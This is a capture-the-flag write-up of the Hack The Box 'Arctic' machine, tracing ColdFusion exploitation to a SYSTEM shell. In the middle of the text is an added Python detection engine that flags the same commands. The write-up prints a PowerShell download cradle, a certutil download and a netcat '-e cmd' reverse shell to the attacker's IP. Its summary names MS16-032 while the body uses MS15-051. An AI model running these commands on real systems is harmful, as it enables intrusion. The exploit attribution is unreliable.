Summary

Arctic is an easy Windows box. It can be exploited by navigating to an odd port in the browser and finding out that ColdFusion is running. A directory traversal can be abused to obtain an encrypted password. The password was cracked and administrative access was obtained. ColdFusion lets you run scheduled tasks; this was used to retrieve a JSP reverse shell, which provided initial access. Sherlock was executed and reported several vulnerabilities the host appeared susceptible to. In this case MS16-032 was used to obtain a reverse shell as SYSTEM.


Discovery

Started off by running NmapAutomator. Nmap discovered the following open ports and services:

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The automated nmap script did not discover any useful exploits. The only interesting port here is 8500. Connecting to it with Netcat returns nothing. Opening it in the browser instead (very slowly) produced a directory listing. Navigating to admin, the following page is shown:


Exploitation

Searchsploit was used to obtain public exploits:

This highlighted vulnerability was checked. It turned out to be a directory traversal that shows the encrypted password:

Submitting the hash to crackstation.net revealed that the password is happyday. Next, ColdFusion can be abused by creating a scheduled task. First, go to Mappings; this shows the directory path, which is required:

Then navigate to Scheduled tasks and add the following:

Note that JSP was used since .cfm is awfully slow. Google confirmed that you can use JSP in ColdFusion.

After this you will receive the following request:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.101.17 - - [21/Feb/2021 19:44:05] "GET /jsp-reverse.jsp HTTP/1.1" 200 -

Now you can open a listener and send a curl request:

curl http://10.129.101.17:8500/CFIDE/reverse.jsp

This provides a shell as the user tolis.


Privilege Escalation

I downloaded Sherlock with the following command:

powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.147/Sherlock.ps1')

It found several potential vulnerabilities:

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

The MS15-051 exploit (ms15-051x64.exe) was used. It was transferred over with certutil:

certutil.exe -urlcache -split -f http://10.10.14.147/ms15-051x64.exe

The same method was used to transfer over nc64.exe. The following command was run:

C:\Users\tolis\Desktop>ms15-051x64.exe "C:\Users\tolis\Desktop\nc64.exe -e cmd 10.10.14.147 1339"
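The three commands above (a PowerShell download cradle, certutil used as a downloader, and netcat spawning cmd towards a remote host) are exactly the process command lines a defender would want to alert on. The following is an added example, not part of the original writeup: a small Python rule engine that scans process-creation command lines and flags those techniques. The log format (`TIMESTAMP|USER|COMMANDLINE`) and the sample lines are constructed for the example; the suspicious entries reuse the commands from this writeup, the benign entries are made up.

```python
import re
from typing import Dict, List

# Detection rules keyed by name. Every regex in a rule's list must match the
# command line (case-insensitively) for that rule to fire.
RULES: Dict[str, List[str]] = {
    # PowerShell download cradle: remote script fetched and executed in memory
    "powershell_download_cradle": [
        r"powershell",
        r"\b(IEX|Invoke-Expression)\b",
        r"Net\.WebClient|DownloadString|DownloadFile",
    ],
    # certutil abused as an HTTP downloader (living-off-the-land file transfer)
    "certutil_download": [
        r"certutil(\.exe)?",
        r"-urlcache",
        r"https?://",
    ],
    # netcat handing a shell to a remote listener
    "netcat_reverse_shell": [
        r"\bnc(64)?(\.exe)?\b",
        r"\s-e\s+(cmd|powershell)",
    ],
}

_COMPILED = {
    name: [re.compile(p, re.IGNORECASE) for p in patterns]
    for name, patterns in RULES.items()
}


def match_rules(command_line: str) -> List[str]:
    """Return the names of all rules whose patterns all match the command line."""
    return [
        name for name, patterns in _COMPILED.items()
        if all(p.search(command_line) for p in patterns)
    ]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan 'TIMESTAMP|USER|COMMANDLINE' lines (constructed format) and
    return one hit per line that triggers at least one rule."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        parts = line.rstrip("\n").split("|", 2)
        if len(parts) != 3:
            continue  # malformed line, skip rather than crash
        timestamp, user, cmd = parts
        rules = match_rules(cmd)
        if rules:
            hits.append({"timestamp": timestamp, "user": user,
                         "rules": rules, "command_line": cmd})
    return hits


# Constructed sample log: three lines mirror the commands in this writeup,
# the rest are benign activity that must not alert.
SAMPLE_LOG = [
    r"2021-02-21T19:50:01|ARCTIC\tolis|powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.147/Sherlock.ps1')",
    r"2021-02-21T19:51:10|ARCTIC\tolis|certutil.exe -hashfile C:\Windows\notepad.exe SHA256",
    r"2021-02-21T19:52:30|ARCTIC\tolis|certutil.exe -urlcache -split -f http://10.10.14.147/ms15-051x64.exe",
    r"2021-02-21T19:53:00|ARCTIC\tolis|powershell Get-Process",
    r"2021-02-21T19:54:12|ARCTIC\tolis|ms15-051x64.exe \"C:\Users\tolis\Desktop\nc64.exe -e cmd 10.10.14.147 1339\"",
    r"2021-02-21T19:55:00|ARCTIC\tolis|ping 10.10.14.147",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['user']} {','.join(hit['rules'])}: {hit['command_line']}")
```

Each rule requires all of its fragments to be present, so routine uses of the same binaries (certutil -hashfile, a plain powershell cmdlet) stay quiet; in production these patterns would be applied to Sysmon Event ID 1 or Windows 4688 command-line fields rather than a pipe-delimited file.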

This provided a system shell:

nc -nvlp 1339
listening on [any] 1339 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.101.17] 50132
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Desktop>whoami
whoami
nt authority\system

Conclusion

This was a really fun box. It was super painful because ColdFusion was really slow and everything took a long time, but I really quite liked the exploitation path. It is quite a real-life box, so that was fun. Hope you enjoyed this writeup!